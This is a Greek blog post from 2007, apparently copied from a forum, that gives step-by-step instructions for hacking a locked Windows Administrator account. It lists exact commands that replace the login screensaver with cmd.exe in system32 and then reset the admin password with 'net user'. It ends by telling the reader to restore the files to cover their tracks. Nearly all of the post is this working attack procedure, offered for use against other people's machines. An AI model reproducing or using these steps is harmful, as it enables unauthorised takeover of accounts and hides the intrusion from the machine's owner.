2 Φεβρουαρίου 2007

Κάντε hack στον κλειδωμένο λογαριασμό του Administrator ενός υπολογιστή.

Αποκτήστε πρόσβαση σε έναν οποιονδήποτε λογαριασμό χρήστη στον υπολογιστή και ανοίξτε ένα παράθυρο DOS (κλικ στο “Έναρξη” -> “Εκτέλεση” -> Πληκτρολογήστε “CMD”) και γράψτε, ΑΚΡΙΒΩΣ, τις παρακάτω εντολές:

cd\windows\system32
mkdir temphack
copy logon.scr temphack\logon.scr
copy cmd.exe temphack\cmd.exe
del logon.scr
rename cmd.exe logon.scr
exit
Αυτό που μόλις κάνετε, είναι:
Μπήκατε στον φάκελο system32.
Δημιουργήσατε έναν φάκελο με όνομα temphack.
Αντιγράψατε το αρχείο logon.scr μέσα στον φάκελο temphack.
Αντιγράψατε το αρχείο cmd.exe μέσα στον φάκελο temphack.
Διαγράψατε το αρχείο logon.scr μέσα από το system32.
Κάνατε μετονομασία το cmd.exe σε logon.scr
Κλείσατε το παράθυρο του DOS.

Αποτέλεσμα όλων αυτών των εντολών είναι ότι αντικαταστήσατε το default Screensaver των Windows με το cmd.exe. Στην επόμενη εκκίνηση του υπολογιστή, στην οθόνη επιλογής χρήστη, θα περιμένετε μέχρι να εμφανιστεί το Screensaver, που δεν θα είναι άλλο από μια γραμμή εντολών του DOS, χωρίς καμιά απολύτως προστασία.

Αφού ανοίξει το παράθυρο του DOS πληκτρολογήστε την παρακάτω εντολή:
net user <όνομα λογαριασμού Administrator> <νέο κωδικό>
Αν για παράδειγμα το όνομα του λογαριασμού του Admin είναι “Phantom” και σαν κωδικό θέλετε το “123” τότε γράφετε:
net user Phantom 123

Μόλις αλλάξατε τον κωδικό του Admin από οτιδήποτε ήταν, σε 123.

ΜΗΝ ξεχάσετε να μεταφέρετε τα αρχεία (cmd.exe, logon.scr) ξανά στον φάκελο system32, έτσι ώστε να καλύψετε τα ίχνη σας.

πηγη: insomnia forum
special thanks to : ntg_net

Δεν υπάρχουν σχόλια:
Γράψτε σχόλια